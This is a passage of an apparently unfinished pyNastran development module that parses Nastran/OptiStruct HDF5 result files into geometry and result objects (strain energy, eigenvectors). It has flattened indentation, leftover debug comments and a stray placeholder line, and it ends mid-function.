from pyNastran.utils import print_bad_path, object_attributes, object_methods, object_stats
from pyNastran.bdf.bdf import BDF
from pyNastran.op2.op2 import OP2
from pyNastran.dev.h5.h5_utils import get_tree, h5py_to_dataframe
from pyNastran.dev.h5.h5_case_control import load_case_control, load_parameters
from pyNastran.dev.h5.h5_elements import element_map
from pyNastran.dev.h5.h5_constraints import constraint_map
from pyNastran.dev.h5.h5_loads import load_map
from pyNastran.dev.h5.h5_tables import table_map
from pyNastran.dev.h5.h5_geometry import (
coord_map, node_map,
material_map,
matrix_map, design_map, dynamic_map, partition_map,
load_geometry_block)
from pyNastran.dev.h5.h5_properties import property_map
from pyNastran.dev.h5.h5_result_objects import RealVectorTable, RealVectorTableOptistruct, RealStrainEnergyOptistruct
#from pyNastran.gui.utils.vtk.base_utils import numpy_to_vtk
Function = Any
from cpylog import SimpleLogger
if TYPE_CHECKING:
from pyNastran.op2.op2 import OP2
class BDF2:
def __init__(self):
self.log = SimpleLogger(level='debug', encoding='utf-8', log_func=None)
self.card_count = {}
self.CTRIA3 = None
self.CQUAD4 = None
self.CTRIA6 = None
self.CQUAD8 = None
self.CTETRA = None
self.CPENTA = None
self.CPYRAM = None
self.CHEXA = None
def break_domain_by_case(domains_df: pd.DataFrame, INDEX_DOMAIN) -> pd.DataFrame:
#subcase = domains_df['SUBCASE']
#analysis_code = domains_df['ANALYSIS']
#eigr = mycase['TIME_FREQ_EIGR']
#eigi = mycase['EIGI']
#mode = mycase['MODE']
subcase = domains_df['SUBCASE']
isubcase = subcase != 0
keys = ['SUBCASE','ANALYSIS', 'STEP', 'DESIGN_CYCLE', 'RANDOM', 'SE', 'AFPM', 'TRMC', 'INSTANCE', 'MODULE']
domain_no_zero = domains_df.loc[isubcase]
grouped = domain_no_zero.groupby(keys)
#for g in grouped:
#print(g)
grouped_df = grouped.size().reset_index().rename(columns={0:'count'})[keys]
#step = mycase['STEP']
#design_cycle = mycase['DESIGN_CYCLE']
#random = mycase['RANDOM']
#se = mycase['SE']
#afpm = mycase['AFPM']
#trmc = mycase['TRMC']
#inst = mycase['INSTANCE']
#module = mycase['MODULE']
return grouped # _df
class pyNastranH5:
def __init__(self,
add_aero: bool=True,
add_constraints: bool=True,
add_results: bool=True,
subcases=None):
self.filename = None
self.geom_model = None
self.add_aero = add_aero
self.add_constraints = add_constraints
self.add_results = add_results
self.flags = {
'aero': add_aero,
'constraint': add_constraints,
'results': add_results,
'subcases': subcases,
}
self.subcases = subcases
self.log = SimpleLogger(level='debug', encoding='utf-8', log_func=None)
def read_h5_nastran(self, h5_filename: str,
subcases: Optional[List[int]]=None) -> None:
self.filename = h5_filename
print(f'opening {h5_filename}')
assert os.path.exists(h5_filename), print_bad_path(h5_filename)
hdf5_file = h5py.File(h5_filename, 'r')
# ['INDEX', 'NASTRAN']
"""
{'INDEX': {
'NASTRAN': {
'RESULT': {
'ELEMENTAL': {
'STRESS': {'QUAD4': None}},
'NODAL': {
'EIGENVECTOR': None}}}},
'NASTRAN': {
'INPUT': {
'DOMAINS': None,
'DYNAMIC': {'EIGRL': {'IDENTITY': None}},
'ELEMENT': {'CQUAD4': None},
'MATERIAL': {'MAT1': None},
'NODE': {'GRID': None},
'PARAMETER': {'CASECC': {'SUBCASE': None},
'MDLPRM': None,
'PVT': {'INT': None}},
'PROPERTY': {'PSHELL': None}
},
'RESULT': {
'DOMAINS': None,
'ELEMENTAL': {'STRESS': {'QUAD4': None}},
'NODAL': {'EIGENVECTOR': None},
'SUMMARY': {'EIGENVALUE': None}}}}
"""
tree = get_tree(hdf5_file)
#pprint(tree)
self._load_geometry(hdf5_file)
#return
self._load_results(hdf5_file, subcases=subcases)
def _load_geometry(self, hdf5_file: h5py.File) -> None:
base_str = 'NASTRAN/INPUT'
inputs = hdf5_file.get(base_str)
#['CONSTRAINT', 'COORDINATE_SYSTEM', 'DESIGN', 'DOMAINS', 'ELEMENT', 'LOAD', 'MATERIAL', 'NODE', 'PARAMETER', 'PROPERTY', 'TABLE']
quiet_skip_inputs = ['DOMAINS', 'PARAMETER']
geom_model = BDF()
geom_model.flags = self.flags
log = geom_model.log
for geom_name in list(inputs):
if geom_name in quiet_skip_inputs:
continue
geom_group = inputs.get(geom_name)
if geom_name == 'CONSTRAINT':
#if not self.add_constraints:
#continue
load_geometry_block(geom_group, constraint_map, geom_model)
elif geom_name == 'COORDINATE_SYSTEM':
load_geometry_block(geom_group, coord_map, geom_model)
elif geom_name == 'DESIGN':
load_geometry_block(geom_group, design_map, geom_model)
#elif geom_name == 'DOMAINS':
elif geom_name == 'DYNAMIC':
load_geometry_block(geom_group, dynamic_map, geom_model)
elif geom_name == 'ELEMENT':
load_geometry_block(geom_group, element_map, geom_model)
elif geom_name == 'LOAD':
load_geometry_block(geom_group, load_map, geom_model)
elif geom_name == 'MATERIAL':
#if not self.add_material:
#continue
load_geometry_block(geom_group, material_map, geom_model)
elif geom_name == 'MATRIX':
load_geometry_block(geom_group, matrix_map, geom_model)
elif geom_name == 'NODE':
load_geometry_block(geom_group, node_map, geom_model)
elif geom_name == 'PARTITION':
load_geometry_block(geom_group, partition_map, geom_model)
elif geom_name == 'PROPERTY':
load_geometry_block(geom_group, property_map, geom_model)
elif geom_name == 'TABLE':
load_geometry_block(geom_group, table_map, geom_model)
else:
log.warning(f'skipping {geom_name}')
load_parameters(hdf5_file, geom_model)
cc_str = 'NASTRAN/INPUT/PARAMETER/CASECC/SUBCASE'
cc = hdf5_file.get(cc_str)
assert cc is not None, cc
load_case_control(geom_model, cc)
#geom_model.write_bdf(r'C:\NASA\m4\formats\git\pyNastran\models\msc\spike.bdf')
finish_geometry(geom_model)
self.geom_model = geom_model
def _load_results(self, hdf5_file: h5py.File,
subcases: Optional[List[int]]=None) -> None:
geom_model = self.geom_model
node_ids = geom_model._node_ids
element_ids = geom_model._element_ids
domains_str = '/NASTRAN/RESULT/DOMAINS'
domains = hdf5_file.get(domains_str)
# ID SUBCASE STEP ANALYSIS TIME_FREQ_EIGR EIGI MODE DESIGN_CYCLE RANDOM SE AFPM TRMC INSTANCE MODULE
# 0 1 0 0 0 0.000000e+00 0.0 0 0 0 0 0 0 0 0
# 1 2 1 0 2 -3.087735e-10 0.0 1 0 0 0 0 0 0 0
# 2 3 1 0 2 -2.082743e-10 0.0 2 0 0 0 0 0 0 0
# 3 4 1 0 2 -1.514309e-10 0.0 3 0 0 0 0 0 0 0
domains_df = h5py_to_dataframe(domains)
assert domains is not None, domains
assert domains_df is not None, domains_df
result_str = '/NASTRAN/RESULT'
result_index_str = '/INDEX/NASTRAN/RESULT'
#stress = hdf5_file.get('/INDEX/NASTRAN/RESULT/ELEMENTAL/STRESS')
#pprint(stress)
#pprint(get_tree(stress))
results_dict = {}
iresult = 0
model = OP2()
log = model.log
results = hdf5_file.get(result_str)
for res_name in results:
#results_group = hdf5_file.get(name)
if res_name in ['NODAL', 'ELEMENTAL',
'AERODYNAMIC', 'DOMAINS', 'MATRIX', 'MONITOR', 'OPTIMIZATION', 'SUMMARY']:
pass
else:
log.warning(f'skipping result {res_name}')
#iresult = self._load_nodal_results(
#iresult, results_dict,
#geom_model, model, node_ids,
#domains_df, hdf5_file, subcases=subcases)
#return
# --------------------------------------------------------------
iresult = self._load_elemental_results(
iresult,
result_str, result_index_str,
results_dict,
geom_model, model, element_ids,
domains_df, hdf5_file, subcases=subcases)
self.results = results_dict
#geom_model.write_bdf(r'C:\NASA\m4\formats\git\pyNastran\models\msc\6+element-nastran-sol103.bdf')
#self.results = results # type: Dict[int, RealVectorTableOptistruct]
#self.results_model = model
def _load_elemental_results(self, iresult: int,
result_str: str, result_index_str: str,
results: Dict[int, Any],
geom_model: BDF,
model: OP2,
element_ids: np.ndarray,
domains_df: pd.DataFrame,
hdf5_file: h5py.File,
subcases: Optional[List[int]]=None) -> int:
elemental_str = result_str + '/ELEMENTAL'
elemental_index_str = result_index_str + '/ELEMENTAL'
assert domains_df is not None
element = hdf5_file.get(elemental_str)
element_index = hdf5_file.get(elemental_index_str)
#pprint(get_tree(element))
#pprint(get_tree(element_index))
basename = ''
for ires, name in enumerate(element):
group = element.get(name)
index = element_index.get(name)
if name == 'ENERGY':
iresult = load_strain_energy(basename, iresult, results,
domains_df, group, index,
element_ids,
geom_model, model,
subcases=subcases)
elif name in ['STRESS', 'STRAIN']:
is_stress = name == 'STRESS'
iresult = load_stress_strain(basename, iresult, results,
domains_df, group, index,
element_ids,
geom_model, model,
is_stress=is_stress,
subcases=subcases)
elif name in ['ELEMENT_FORCE', 'FAILURE_INDEX']:
pass
#load_eigenvector(results, i, domains_df, group, index, model)
else:
raise NotImplementedError(name)
#element = hdf5_file.get(element_str)
#pprint(get_tree(element))
#load_geometry_block(element, element_map, geom_model)
def _load_nodal_results(self, iresult: int,
results: Dict[int, Any],
geom_model: BDF,
model: OP2,
node_ids: np.ndarray,
domains_df: pd.DataFrame,
hdf5_file: h5py.File,
subcases: Optional[List[int]]=None) -> int:
assert domains_df is not None
nodal_str = '/NASTRAN/RESULT/NODAL'
nodal_index_str = '/INDEX/NASTRAN/RESULT/NODAL'
name_map = {
'EIGENVECTOR': 'Eigenvector',
'EIGENVECTOR_CPLX': 'Eigenvector',
'DISPLACEMENT': 'Displacement',
'DISPLACEMENT_CPLX': 'Displacement',
'VELOCITY': 'Velocity',
'APPLIED_LOAD': 'Applied Load',
'APPLIED_LOAD_CPLX': 'Applied Load',
'SPC_FORCE': 'SPC Force',
'SPC_FORCE_CPLX': 'SPC Force',
'MPC_FORCE': 'MPC Force',
'MPC_FORCE_CPLX': 'MPC Force',
'GRID_FORCE': 'Grid Point Force',
'KINETIC_ENERGY': 'Kinetic Energy',
'GRID_WEIGHT': 'Grid Point Weight',
'TEMPERATURE': 'Temperature',
#'KINETIC_ENERGY': 'Eigenvector',
}
node = hdf5_file.get(nodal_str)
node_index = hdf5_file.get(nodal_index_str)
#pprint(get_tree(node))
#pprint(get_tree(node_index))
for ires, name in enumerate(node):
group = node.get(name)
index = node_index.get(name)
basename = name_map[name]
if name == 'EIGENVECTOR':
iresult = load_eigenvector(basename, iresult, results, domains_df, group, index,
node_ids, geom_model, model, subcases=subcases)
elif name in ['EIGENVECTOR_CPLX', 'APPLIED_LOAD_CPLX', 'DISPLACEMENT_CPLX', 'SPC_FORCE_CPLX', 'MPC_FORCE_CPLX']:
iresult = load_eigenvector_complex(basename, iresult, results, domains_df, group, index,
node_ids, geom_model, model, subcases=subcases)
elif name in ['DISPLACEMENT', 'VELOCITY']:
iresult = load_eigenvector(basename, iresult, results, domains_df, group, index,
node_ids, geom_model, model, subcases=subcases)
elif name in ['SPC_FORCE', 'MPC_FORCE', 'APPLIED_LOAD']:
iresult = load_eigenvector(basename, iresult, results, domains_df, group, index,
node_ids, geom_model, model, subcases=subcases)
elif name in ['GRID_FORCE', 'KINETIC_ENERGY', 'GRID_WEIGHT', 'TEMPERATURE']:
# GRID_POINT_FORCE
pass
else:
raise NotImplementedError(name)
#load_geometry_block(node, node_map, model)
return iresult
def finish_geometry(geom_model: BDF):
from pyNastran.dev.h5.fill_unstructured_grid import _load_nodes
nodes, node_ids, nid_map, idtype = _load_nodes(geom_model)
geom_model._nodes = nodes
geom_model._node_ids = node_ids
geom_model._element_ids = None
geom_model._nid_map = nid_map
geom_model._idtype = idtype
def load_strain_energy(basename_orig: str,
iresult: int,
results: Dict[int, Function],
domains_df: pd.DataFrame,
element_group: h5py._hl.group.Group,
element_index: h5py._hl.group.Group,
ids: np.ndarray,
geom_model: BDF,
model: OP2,
subcases: Optional[List[int]]=None) -> int:
basename = 'Strain Energy'
#assert ids is not None
for ires, element_group_name in enumerate(element_group):
group = element_group.get(element_group_name)
index = element_index.get(element_group_name)
if element_group_name == 'IDENT':
#group = <class 'h5py._hl.dataset.Dataset'>
#('IDENT', 'ELNAME', 'ETOTAL', 'CVALRES', 'ESUBT', 'ETOTPOS', 'ETOTNEG')
#IDENT = array([ 1, 2, 3, 4, 5])
#ELNAME = array([b'BAR ', b'HEXA ', b'PENTA '])
pass
elif element_group_name == 'STRAIN_ELEM':
#group = <class 'h5py._hl.dataset.Dataset'>
#('ID', 'ENERGY', 'PCT', 'DEN', 'IDENT', 'DOMAIN_ID')
#index = <class 'h5py._hl.dataset.Dataset'>
#('DOMAIN_ID', 'POSITION', 'LENGTH')
INDEX_DOMAIN = index['DOMAIN_ID']
INDEX_POSITION = index['POSITION']
INDEX_LENGTH = index['LENGTH']
EID_BASE = group['ID']
ieid = ~(EID_BASE == 100000000)
EID = EID_BASE[ieid]
ENERGY = group['ENERGY', ieid]
PCT = group['PCT', ieid]
DEN = group['DEN', ieid]
IDENT = group['IDENT', ieid]
DOMAIN = group['DOMAIN_ID', ieid]
grouped_df = break_domain_by_case(domains_df, INDEX_DOMAIN)
subcases = geom_model.subcases
for tuplei in grouped_df:
indexi, dfi = tuplei
DOMAINs = dfi['ID']
# dfi
# ID SUBCASE STEP ANALYSIS TIME_FREQ_EIGR EIGI MODE DESIGN_CYCLE RANDOM SE AFPM TRMC INSTANCE MODULE
# 0 1 1 0 2 -2.572570e-07 0.0 1 0 0 0 0 0 0 0
# 1 2 1 0 2 8.711537e-07 0.0 2 0 0 0 0 0 0 0
# 2 3 1 0 2 2.950070e-06 0.0 3 0 0 0 0 0 0 0
# 3 4 1 0 2 3.668822e-06 0.0 4 0 0 0 0 0 0 0
# 4 5 1 0 2 4.037721e-06 0.0 5 0 0 0 0 0 0 0
# 5 6 1 0 2 5.389803e-06 0.0 6 0 0 0 0 0 0 0
# 6 7 1 0 2 9.181562e+03 0.0 7 0 0 0 0 0 0 0
# 7 8 1 0 2 2.184327e+04 0.0 8 0 0 0 0 0 0 0
# 8 9 1 0 2 2.399637e+04 0.0 9 0 0 0 0 0 0 0
# 9 10 1 0 2 2.903699e+04 0.0 10 0 0 0 0 0 0 0
# 10 11 1 0 2 3.472390e+04 0.0 11 0 0 0 0 0 0 0
# 11 12 1 0 2 4.077224e+04 0.0 12 0 0 0 0 0 0 0
# 12 13 1 0 2 6.833794e+04 0.0 13 0 0 0 0 0 0 0
# 13 14 1 0 2 8.648623e+04 0.0 14 0 0 0 0 0 0 0
# 14 15 1 0 2 9.260647e+04 0.0 15 0 0 0 0 0 0 0
# 15 16 1 0 2 6.013470e-154 0.0 1 0 0 0 0 0 0 0
# 16 17 1 0 2 6.013471e-154 0.0 1 0 0 0 0 0 0 0
# 17 18 1 0 2 6.013471e-154 0.0 1 0 0 0 0 0 0 0
# 18 19 1 0 2 6.013471e-154 0.0 1 0 0 0 0 0 0 0
# 19 20 1 0 2 6.013471e-154 0.0 1 0 0 0 0 0 0 0
# 20 21 1 0 2 6.013471e-154 0.0 1 0 0 0 0 0 0 0
# 21 22 1 0 2 6.013470e-154 0.0 2 0 0 0 0 0 0 0
# 22 23 1 0 2 6.013471e-154 0.0 2 0 0 0 0 0 0 0
# 23 24 1 0 2 6.013471e-154 0.0 2 0 0 0 0 0 0 0
# 24 25 1 0 2 6.013471e-154 0.0 2 0 0 0 0 0 0 0
# 25 26 1 0 2 6.013471e-154 0.0 2 0 0 0 0 0 0 0
# 26 27 1 0 2 6.013471e-154 0.0 2 0 0 0 0 0 0 0
# 27 28 1 0 2 6.013470e-154 0.0 3 0 0 0 0 0 0 0
# 28 29 1 0 2 6.013471e-154 0.0 3 0 0 0 0 0 0 0
# 29 30 1 0 2 6.013471e-154 0.0 3 0 0 0 0 0 0 0
# 30 31 1 0 2 6.013471e-154 0.0 3 0 0 0 0 0 0 0
# 31 32 1 0 2 6.013471e-154 0.0 3 0 0 0 0 0 0 0
# 32 33 1 0 2 6.013471e-154 0.0 3 0 0 0 0 0 0 0
# 33 34 1 0 2 6.013470e-154 0.0 4 0 0 0 0 0 0 0
# 34 35 1 0 2 6.013471e-154 0.0 4 0 0 0 0 0 0 0
# 35 36 1 0 2 6.013471e-154 0.0 4 0 0 0 0 0 0 0
# 36 37 1 0 2 6.013471e-154 0.0 4 0 0 0 0 0 0 0
# 37 38 1 0 2 6.013471e-154 0.0 4 0 0 0 0 0 0 0
# 38 39 1 0 2 6.013471e-154 0.0 4 0 0 0 0 0 0 0
# 39 40 1 0 2 6.013470e-154 0.0 5 0 0 0 0 0 0 0
# 40 41 1 0 2 6.013471e-154 0.0 5 0 0 0 0 0 0 0
# 41 42 1 0 2 6.013471e-154 0.0 5 0 0 0 0 0 0 0
# 42 43 1 0 2 6.013471e-154 0.0 5 0 0 0 0 0 0 0
# 43 44 1 0 2 6.013471e-154 0.0 5 0 0 0 0 0 0 0
# 44 45 1 0 2 6.013471e-154 0.0 5 0 0 0 0 0 0 0
# 45 46 1 0 2 6.013470e-154 0.0 6 0 0 0 0 0 0 0
# 46 47 1 0 2 6.013471e-154 0.0 6 0 0 0 0 0 0 0
# 47 48 1 0 2 6.013471e-154 0.0 6 0 0 0 0 0 0 0
# 48 49 1 0 2 6.013471e-154 0.0 6 0 0 0 0 0 0 0
# 49 50 1 0 2 6.013471e-154 0.0 6 0 0 0 0 0 0 0
# 50 51 1 0 2 6.013471e-154 0.0 6 0 0 0 0 0 0 0
# 51 52 1 0 2 6.013470e-154 0.0 7 0 0 0 0 0 0 0
# 52 53 1 0 2 6.013471e-154 0.0 7 0 0 0 0 0 0 0
# 53 54 1 0 2 6.013471e-154 0.0 7 0 0 0 0 0 0 0
# 54 55 1 0 2 6.013471e-154 0.0 7 0 0 0 0 0 0 0
# 55 56 1 0 2 6.013471e-154 0.0 7 0 0 0 0 0 0 0
# 56 57 1 0 2 6.013471e-154 0.0 7 0 0 0 0 0 0 0
# 57 58 1 0 2 6.013470e-154 0.0 8 0 0 0 0 0 0 0
# 58 59 1 0 2 6.013471e-154 0.0 8 0 0 0 0 0 0 0
# 59 60 1 0 2 6.013471e-154 0.0 8 0 0 0 0 0 0 0
# 60 61 1 0 2 6.013471e-154 0.0 8 0 0 0 0 0 0 0
# 61 62 1 0 2 6.013471e-154 0.0 8 0 0 0 0 0 0 0
# 62 63 1 0 2 6.013471e-154 0.0 8 0 0 0 0 0 0 0
# 63 64 1 0 2 6.013470e-154 0.0 9 0 0 0 0 0 0 0
# 64 65 1 0 2 6.013471e-154 0.0 9 0 0 0 0 0 0 0
# 65 66 1 0 2 6.013471e-154 0.0 9 0 0 0 0 0 0 0
# 66 67 1 0 2 6.013471e-154 0.0 9 0 0 0 0 0 0 0
# 67 68 1 0 2 6.013471e-154 0.0 9 0 0 0 0 0 0 0
# 68 69 1 0 2 6.013471e-154 0.0 9 0 0 0 0 0 0 0
# 69 70 1 0 2 6.013470e-154 0.0 10 0 0 0 0 0 0 0
# 70 71 1 0 2 6.013471e-154 0.0 10 0 0 0 0 0 0 0
# 71 72 1 0 2 6.013471e-154 0.0 10 0 0 0 0 0 0 0
# 72 73 1 0 2 6.013471e-154 0.0 10 0 0 0 0 0 0 0
# 73 74 1 0 2 6.013471e-154 0.0 10 0 0 0 0 0 0 0
# 74 75 1 0 2 6.013471e-154 0.0 10 0 0 0 0 0 0 0
# 75 76 1 0 2 6.013470e-154 0.0 11 0 0 0 0 0 0 0
# 76 77 1 0 2 6.013471e-154 0.0 11 0 0 0 0 0 0 0
# 77 78 1 0 2 6.013471e-154 0.0 11 0 0 0 0 0 0 0
# 78 79 1 0 2 6.013471e-154 0.0 11 0 0 0 0 0 0 0
# 79 80 1 0 2 6.013471e-154 0.0 11 0 0 0 0 0 0 0
# 80 81 1 0 2 6.013471e-154 0.0 11 0 0 0 0 0 0 0
# 81 82 1 0 2 6.013470e-154 0.0 12 0 0 0 0 0 0 0
# 82 83 1 0 2 6.013471e-154 0.0 12 0 0 0 0 0 0 0
# 83 84 1 0 2 6.013471e-154 0.0 12 0 0 0 0 0 0 0
# 84 85 1 0 2 6.013471e-154 0.0 12 0 0 0 0 0 0 0
# 85 86 1 0 2 6.013471e-154 0.0 12 0 0 0 0 0 0 0
# 86 87 1 0 2 6.013471e-154 0.0 12 0 0 0 0 0 0 0
# 87 88 1 0 2 6.013470e-154 0.0 13 0 0 0 0 0 0 0
# 88 89 1 0 2 6.013471e-154 0.0 13 0 0 0 0 0 0 0
# 89 90 1 0 2 6.013471e-154 0.0 13 0 0 0 0 0 0 0
# 90 91 1 0 2 6.013471e-154 0.0 13 0 0 0 0 0 0 0
# 91 92 1 0 2 6.013471e-154 0.0 13 0 0 0 0 0 0 0
# 92 93 1 0 2 6.013471e-154 0.0 13 0 0 0 0 0 0 0
# 93 94 1 0 2 6.013470e-154 0.0 14 0 0 0 0 0 0 0
# 94 95 1 0 2 6.013471e-154 0.0 14 0 0 0 0 0 0 0
# 95 96 1 0 2 6.013471e-154 0.0 14 0 0 0 0 0 0 0
# 96 97 1 0 2 6.013471e-154 0.0 14 0 0 0 0 0 0 0
# 97 98 1 0 2 6.013471e-154 0.0 14 0 0 0 0 0 0 0
# 98 99 1 0 2 6.013471e-154 0.0 14 0 0 0 0 0 0 0
# 99 100 1 0 2 6.013470e-154 0.0 15 0 0 0 0 0 0 0
# 100 101 1 0 2 6.013471e-154 0.0 15 0 0 0 0 0 0 0
# 101 102 1 0 2 6.013471e-154 0.0 15 0 0 0 0 0 0 0
# 102 103 1 0 2 6.013471e-154 0.0 15 0 0 0 0 0 0 0
# 103 104 1 0 2 6.013471e-154 0.0 15 0 0 0 0 0 0 0
# 104 105 1 0 2 6.013471e-154 0.0 15 0 0 0 0 0 0 0
#print(indexi)
#print(dfi)
#print('---------------------')
idomain = np.searchsorted(DOMAINs, INDEX_DOMAIN)
exists = idomain < len(INDEX_DOMAIN)
if not np.all(exists):
if not np.any(exists):
continue
idomain = idomain[exists]
print('partial domain...')
#idomain = []
#for domain, position, length in zip(INDEX_DOMAIN, INDEX_POSITION, INDEX_LENGTH):
#idomain = (DOMAIN_ID == domain)
#mycase = domains_df.loc[idomain]
position = INDEX_POSITION[idomain]
length = INDEX_LENGTH[idomain]
# ID=1; Analysis=0 -> eigenvalues
# ID SUBCASE STEP ANALYSIS TIME_FREQ_EIGR EIGI MODE DESIGN_CYCLE RANDOM SE AFPM TRMC INSTANCE MODULE
# 0 1 0 0 0 0.000000e+00 0.0 0 0 0 0 0 0 0 0
# 1 2 1 0 2 -3.087735e-10 0.0 1 0 0 0 0 0 0 0
# 2 3 1 0 2 -2.082743e-10 0.0 2 0 0 0 0 0 0 0
# 3 4 1 0 2 -1.514309e-10 0.0 3 0 0 0 0 0 0 0
subcase = dfi['SUBCASE'][idomain] # .values[0]
analysis_code = dfi['ANALYSIS'][idomain]
eigr = dfi['TIME_FREQ_EIGR'][idomain]# .values[0]
eigi = dfi['EIGI'][idomain]
mode = dfi['MODE'][idomain]# .values[0]
#SEID Integer, default=0 Super element id of the data block
#AFPMID Integer, default=0 Acoustic field point mesh id
#TRIMID Trim id, default=0 Trim component id
step = dfi['STEP'][idomain].values[0]
design_cycle = dfi['DESIGN_CYCLE'][idomain].values[0]
random = dfi['RANDOM'][idomain].values[0]
se = dfi['SE'][idomain].values[0]
afpm = dfi['AFPM'][idomain].values[0]
trmc = dfi['TRMC'][idomain].values[0]
inst = dfi['INSTANCE'][idomain].values[0]
module = dfi['MODULE'][idomain].values[0]
assert step in [0, 1], step
#assert design_cycle == 0, design_cycle
assert random == 0, random
assert se == 0, se
assert afpm == 0, afpm
assert trmc == 0, trmc
assert inst == 0, inst
assert module == 0, module
iresults = np.full(len(idomain), np.nan, dtype='int32')
is_freq = np.abs(eigr).max() != 0 or np.abs(eigi).max() != 0
is_modes = mode.max() != 0
#step_type = ''
for itime, subcasei, analysis_codei, modei, eigri, eigii, idomaini, positioni, lengthi in zip(count(), subcase, analysis_code, mode, eigr, eigi, idomain, position, length):
name = _get_eigenvector_name(basename, subcasei, analysis_codei, modei, eigri, eigii,
is_modes, is_freq)
if subcasei in subcases:
#print('found subcase')
pass
i0 = positioni
i1 = positioni + lengthi
iresults[itime] = iresult
_domain = DOMAIN[i0]
eid = EID[i0:i1]
energy = ENERGY[i0:i1]
percent = PCT[i0:i1]
density = DEN[i0:i1]
ident = IDENT[i0:i1] # TODO: what is this????
print(name, 'ident', list(np.unique(ident)))
results[iresult] = RealStrainEnergyOptistruct(
name, itime, iresult, iresults,
_domain, position, length,
eid,
energy, percent, density,
_domain, location='element')
iresult += 1
#if name in ['BAR', 'QUAD4_COMP', 'TRIA3_COMP']:
#pass
else:
raise NotImplementedError(name)
def load_stress_strain(basename_orig: str,
iresult: int,
results: Dict[int, Function],
domains_df: pd.DataFrame,
element_group: h5py._hl.group.Group,
element_index: h5py._hl.group.Group,
ids: np.ndarray,
geom_model: BDF,
model: OP2,
is_stress: bool=True,
subcases: Optional[List[int]]=None) -> int:
for ires, name in enumerate(element_group):
group = element_group.get(name)
index = element_index.get(name)
if name in ['BAR', 'QUAD4_COMP', 'TRIA3_COMP']:
pass
else:
raise NotImplementedError(name)
asdf
def load_eigenvector(basename_orig: str,
iresult: int,
results: Dict[int, Function],
domains_df: pd.DataFrame,
group: h5py._hl.dataset.Dataset,
index: h5py._hl.dataset.Dataset,
ids: np.ndarray,
geom_model: BDF,
model: OP2,
subcases: Optional[List[int]]=None) -> int:
"""
<HDF5 dataset "EIGENVECTOR": shape (147,), type "|V64">
Dataset:
attrs : <Attributes of HDF5 object at 2156696909096>
chunks : (510,)
compression : 'gzip'
compression_opts : 1
dims : <Dimensions of HDF5 object at 2156696909096>
dtype : dtype([('ID', '<i8'), ('X', '<f8'), ('Y', '<f8'), ('Z', '<f8'), ('RX', '<f8'), ('RY', '<f8'), ('RZ', '<f8'), ('DOMAIN_ID', '<i8')])
external : None
file : <HDF5 file "6+element-nastran-sol103.h5" (mode r)>
fillvalue : (0, 0., 0., 0., 0., 0., 0., 0)
fletcher32 : False
id : <h5py.h5d.DatasetID object at 0x000001F625273528>
is_virtual : False
maxshape : (None,)
name : '/NASTRAN/RESULT/NODAL/EIGENVECTOR'
nbytes : 9408
ndim : 1
parent : <HDF5 group "/NASTRAN/RESULT/NODAL" (1 members)>
ref : <HDF5 object reference>
regionref : <h5py._hl.base._RegionProxy object at 0x000001F625247DC8>
scaleoffset : None
shape : (147,)
shuffle : True
size : 147
-------------------------------------------------
Dataset:
attrs : <Attributes of HDF5 object at 1418106158632>
chunks : None
compression : None
compression_opts : None
dims : <Dimensions of HDF5 object at 1418106158632>
dtype : dtype([('DOMAIN_ID', '<i8'), ('POSITION', '<i8'), ('LENGTH', '<i8')])
external : None
file : <HDF5 file "6+element-nastran-sol103.h5" (mode r)>
fillvalue : (0, 0, 0)
fletcher32 : False
id : <h5py.h5d.DatasetID object at 0x0000014A2DB6BE28>
is_virtual : False
maxshape : (3,)
name : '/INDEX/NASTRAN/RESULT/NODAL/EIGENVECTOR'
nbytes : 72
ndim : 1
parent : <HDF5 group "/INDEX/NASTRAN/RESULT/NODAL" (1 members)>
ref : <HDF5 object reference>
regionref : <h5py._hl.base._RegionProxy object at 0x0000014A2DBB1108>
scaleoffset : None
shape : (3,)
shuffle : False
size : 3
"""
basename_orig += ' (real)'
# TODO: check real/imaginary or magnitude/phase
#'ID', 'X', 'Y', 'Z', 'RX', 'RY', 'RZ', 'DOMAIN_ID',
#'DOMAIN_ID', 'POSITION', 'LENGTH'
INDEX_DOMAIN = index['DOMAIN_ID']
INDEX_POSITION = index['POSITION']
INDEX_LENGTH = index['LENGTH']
NID = group['ID']
names = group.dtype.names
if 'X' in names:
TX = group['X']
TY = group['Y']
TZ = group['Z']
RX = group['RX']
RY = group['RY']
RZ = group['RZ']
solver = 'msc'
elif 'VALUE' in names:
VALUE = group['VALUE']
#(20214885, 6)
solver = 'optistruct'
else:
raise RuntimeError(str(names))
DOMAIN = group['DOMAIN_ID']
# what are the subcases...
#udomains = np.unique(DOMAIN)
#all_data = np.stack([X, Y, Z, RX, RY, RZ], axis=1, out=None)
DOMAIN_ID = domains_df['ID']
grouped_df = break_domain_by_case(domains_df, INDEX_DOMAIN)
subcases = geom_model.subcases
for tuplei in grouped_df:
indexi, dfi = tuplei
DOMAINs = dfi['ID']
#print(indexi)
#print(dfi)
#print('---------------------')
idomain = np.searchsorted(DOMAINs, INDEX_DOMAIN)
exists = idomain < len(INDEX_DOMAIN)
if not np.all(exists):
if np.any(exists):
raise RuntimeError(idomain)
continue
#idomain = []
#for domain, position, length in zip(INDEX_DOMAIN, INDEX_POSITION, INDEX_LENGTH):
#idomain = (DOMAIN_ID == domain)
#mycase = domains_df.loc[idomain]
position = INDEX_POSITION[idomain]
length = INDEX_LENGTH[idomain]
# ID=1; Analysis=0 -> eigenvalues
# ID SUBCASE STEP ANALYSIS TIME_FREQ_EIGR EIGI MODE DESIGN_CYCLE RANDOM SE AFPM TRMC INSTANCE MODULE
# 0 1 0 0 0 0.000000e+00 0.0 0 0 0 0 0 0 0 0
# 1 2 1 0 2 -3.087735e-10 0.0 1 0 0 0 0 0 0 0
# 2 3 1 0 2 -2.082743e-10 0.0 2 0 0 0 0 0 0 0
# 3 4 1 0 2 -1.514309e-10 0.0 3 0 0 0 0 0 0 0
subcase = dfi['SUBCASE']# .values[0]
analysis_code = dfi['ANALYSIS']
eigr = dfi['TIME_FREQ_EIGR']# .values[0]
eigi = dfi['EIGI']
mode = dfi['MODE']# .values[0]
#SEID Integer, default=0 Super element id of the data block
#AFPMID Integer, default=0 Acoustic field point mesh id
#TRIMID Trim id, default=0 Trim component id
step = dfi['STEP'].values[0]
design_cycle = dfi['DESIGN_CYCLE'].values[0]
random = dfi['RANDOM'].values[0]
se = dfi['SE'].values[0]
afpm = dfi['AFPM'].values[0]
trmc = dfi['TRMC'].values[0]
inst = dfi['INSTANCE'].values[0]
module = dfi['MODULE'].values[0]
assert step in [0, 1], step
#assert design_cycle == 0, design_cycle
assert random == 0, random
